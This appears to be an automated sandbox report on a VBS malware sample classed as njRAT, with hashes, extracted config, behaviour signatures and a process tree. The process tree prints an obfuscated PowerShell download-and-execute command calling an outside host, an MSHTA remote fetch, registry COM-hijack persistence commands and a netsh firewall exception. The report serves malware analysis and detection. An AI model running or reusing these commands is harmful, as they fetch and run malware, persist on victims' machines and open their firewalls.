Analysis
max time kernel: 135s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-08-2022 18:31
Static task: static1
Behavioral task: behavioral1
Sample: DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource: win7-20220715-en
Behavioral task: behavioral2
Sample: DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource: win10v2004-20220721-en
General
-
Target
DWRNHNKWSJEHWYPNYOGGOP.vbs
-
Size
1KB
-
MD5
43f89bd927a7e80c8240c61617dee7bf
-
SHA1
6a8ab5c11c1afd276cf5dbb7b125cff26080459f
-
SHA256
f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a
-
SHA512
f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4
Malware Config
Extracted
https://tradeguru.com.pk/enc2.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXE, POWERSHELL.exe, POWERSHELL.exe
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4648 4532 MSHTA.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4624 4532 POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4168 4532 POWERSHELL.exe
-
Blocklisted process makes network request 3 IoCs
Processes:
MSHTA.EXE, POWERSHELL.exe
flow pid process
5 4648 MSHTA.EXE
16 4648 MSHTA.EXE
26 4624 POWERSHELL.exe
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exe
description pid process target process
PID 3568 set thread context of 1272 3568 powershell.exe aspnet_compiler.exe
-
Modifies registry class 4 IoCs
Processes:
reg.exe, reg.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POWERSHELL.exe, powershell.exe, POWERSHELL.exe, powershell.exe
pid process
4624 POWERSHELL.exe
4624 POWERSHELL.exe
1808 powershell.exe
1808 powershell.exe
4168 POWERSHELL.exe
4168 POWERSHELL.exe
3568 powershell.exe
3568 powershell.exe
3568 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exe, powershell.exe, POWERSHELL.exe, cmd.exe, cmd.exe, powershell.exe, aspnet_compiler.exe
description pid process target process
PID 4624 wrote to memory of 1808 4624 POWERSHELL.exe powershell.exe
PID 4624 wrote to memory of 1808 4624 POWERSHELL.exe powershell.exe
PID 1808 wrote to memory of 632 1808 powershell.exe WScript.exe
PID 1808 wrote to memory of 632 1808 powershell.exe WScript.exe
PID 4168 wrote to memory of 1436 4168 POWERSHELL.exe cmd.exe
PID 4168 wrote to memory of 1436 4168 POWERSHELL.exe cmd.exe
PID 1436 wrote to memory of 2960 1436 cmd.exe reg.exe
PID 1436 wrote to memory of 2960 1436 cmd.exe reg.exe
PID 1436 wrote to memory of 2268 1436 cmd.exe reg.exe
PID 1436 wrote to memory of 2268 1436 cmd.exe reg.exe
PID 1436 wrote to memory of 1128 1436 cmd.exe cmd.exe
PID 1436 wrote to memory of 1128 1436 cmd.exe cmd.exe
PID 1128 wrote to memory of 3568 1128 cmd.exe powershell.exe
PID 1128 wrote to memory of 3568 1128 cmd.exe powershell.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe
PID 1272 wrote to memory of 4072 1272 aspnet_compiler.exe netsh.exe
PID 1272 wrote to memory of 4072 1272 aspnet_compiler.exe netsh.exe
PID 1272 wrote to memory of 4072 1272 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs" 1⤵
-
C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc2.txt 1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 
'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = '8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs" 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat 1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat"" 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f 3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f 3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'" 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'" 4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE 6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat
Filesize: 706B
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1
Filesize: 3KB
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs
Filesize: 1KB
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1
Filesize: 604KB
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize: 3KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B